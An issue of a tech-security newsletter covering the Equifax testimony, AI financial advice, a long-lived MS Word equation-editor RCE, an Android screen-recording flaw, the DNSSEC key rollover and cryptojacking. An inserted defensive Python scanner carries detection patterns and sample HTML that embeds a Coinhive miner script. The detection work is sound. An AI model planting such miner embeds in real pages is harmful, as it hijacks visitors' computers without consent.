The Other Y2K Bug: It Still Lurks In Your MS Word And It Allows Remote Code Execution


Weekly Axis Of Easy #26



In this issue:

  • Bruce Schneier to Congress: Equifax breach was huge and solely Equifax’s fault
  • Your financial advisor may soon be powered by Artificial Intelligence
  • The other Y2K bug: it still lurks in your MS Word and it allows Remote Code Execution
  • Root DNS Key Rollover postponed over concerns 20 million users would go dark
  • Android bug allows attackers to record your smartphone’s audio and screen
  • Latest craze in hacking is hijacking your CPU to mine crypto-currency
  • How to claim your domain name on Ethereum’s ENS system

Bruce Schneier to Congress: Equifax breach was huge and solely Equifax’s fault

Renowned security expert and IBM Division CTO Bruce Schneier gave testimony to the US Congress last week to offer insight into the now famous Equifax data breach. Mr. Schneier concluded that the breach put everyone exposed at risk of identity theft and was completely Equifax’s fault. Further, other data brokers hold similar information and are at risk of the same thing in the future, and the current regulatory environment is insufficient to the task.

Your financial advisor may soon be powered by Artificial Intelligence

Globe and Mail article about the increasing role of Artificial Intelligence in financial planning and investing. While the article posits that it’s still 10 years off before these AI algos start making your investment decisions for you, recall that a couple of weeks ago we mentioned the unveiling of AIEQ, the world’s first “AI driven ETF” (and it’s only down about one percent since it launched).

While I personally switched away from being “an AI skeptic” about a year ago and now think AI will happen, I do not think AI will actually become conscious. That’s what it takes, IMHO, to achieve market-beating investment returns. We’ll probably find out sooner than any of us actually expect.

The other Y2K bug: it still lurks in your MS Word and it allows Remote Code Execution

An absolutely fascinating in-depth look at a Remote Code Execution bug in the Microsoft Equation Editor component of MS Word, which has been sitting in there since the year 2000. The culprit is the EQNEDT32.EXE module, which was used in Microsoft Office 2000 and 2003. While the method used to render equations changed in the 2007 version of the software suite, the faulty executable was left in the distribution, where it remains to this day.

Android bug allows attackers to record your smartphone’s audio and screen

The Android service MediaProjection, which facilitates the capturing and recording of screen contents and audio, has a security vulnerability that can be exploited by hackers, giving the attacker the ability to do the same. The vulnerability affects smartphones running Lollipop, Marshmallow and Nougat.

Root DNS Key Rollover postponed over concerns 20 million users would go dark

The people who run the Internet, ICANN, have decided to postpone the DNSSEC root key rollover until the first quarter of 2018. The DNSSEC “Key Signing Key” is the key that signs the Internet root zone, which establishes the chain of trust to which all subsequent DNSSEC chains are tied. A survey of DNSSEC-enabled resolvers showed that an unacceptably high share, about 6%, were improperly configured and would not be able to handle the rollover. Were the rollover to proceed, anybody using those resolvers would lose DNS resolution. It’s hard to tell how many people that would affect, but the estimate given was 20 million users worldwide.

Latest craze in hacking is hijacking your CPU to mine crypto-currency

Somebody came up with a way to mine crypto-currency in JavaScript, and now it’s being used all over the place to hijack unsuspecting users’ CPUs. Granted, Coinhive’s JavaScript code to mine Monero is itself legitimate and above board. It is intended as an alternative way to monetize websites instead of running increasingly intrusive ads; when properly used, it’s obvious to the user that it’s there, and it either needs to be explicitly consented to or can be turned off. It even has a nifty “captcha” feature that can be used to force people to prove they’re not robots.

It didn’t take long, however, for people to bypass those niceties, and thus little JavaScript Monero miners are popping up all over the place: in hacked websites, WordPress plugins, mobile apps, you name it. Most web protection software is now actively detecting and blocking it.

Also see: http://coinhive.com/
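As an added, defender-side example (not code from this newsletter or from Coinhive), here is a small Python scanner that does the kind of check the web protection software mentioned above performs: it flags pages that load a script from coinhive.com or start a Coinhive-style Monero miner inline. The coinhive.com host comes from the page; the inline `new CoinHive.<name>(` pattern and the sample HTML are assumed/constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts known to serve the Monero miner discussed above; extend with your own blocklist.
MINER_HOSTS = {"coinhive.com"}
# Shape of the inline call that starts Coinhive's client (an assumed pattern, not quoted on the page).
MINER_INLINE = re.compile(r"new\s+CoinHive\.\w+\s*\(", re.IGNORECASE)

class MinerScanner(HTMLParser):
    """Records <script src> tags from miner hosts and inline scripts that start a miner."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.findings = []  # list of (kind, evidence) tuples

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self.in_script = True
        src = dict(attrs).get("src") or ""
        # Absolute and scheme-relative URLs yield a hostname; relative paths do not.
        host = urlparse(src if "//" in src else "//" + src).hostname or ""
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            self.findings.append(("external", src))

    def handle_data(self, data):
        hit = MINER_INLINE.search(data) if self.in_script else None
        if hit:
            self.findings.append(("inline", hit.group(0)))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

def scan_html(html):
    """Return miner indicators found in an HTML document; an empty list means none."""
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample resembling a footer injected by a compromised WordPress plugin.
SAMPLE_HTML = """<html><body><p>Welcome</p>
<script src="https://example.org/jquery.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3}); miner.start();</script>
</body></html>"""
```

Calling `scan_html(SAMPLE_HTML)` returns one external and one inline finding; run it over pages fetched from your own sites or plugin output to spot unexpected miner embeds.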

I’ve accelerated spinning up the Guerrilla Capitalism list and site. I’m hoping next week I’ll start putting out material there about disruptive technologies (including bitcoin) and how to compete against the 800 lb gorilla in your space. To get on the new newsletter’s list, sign up here.
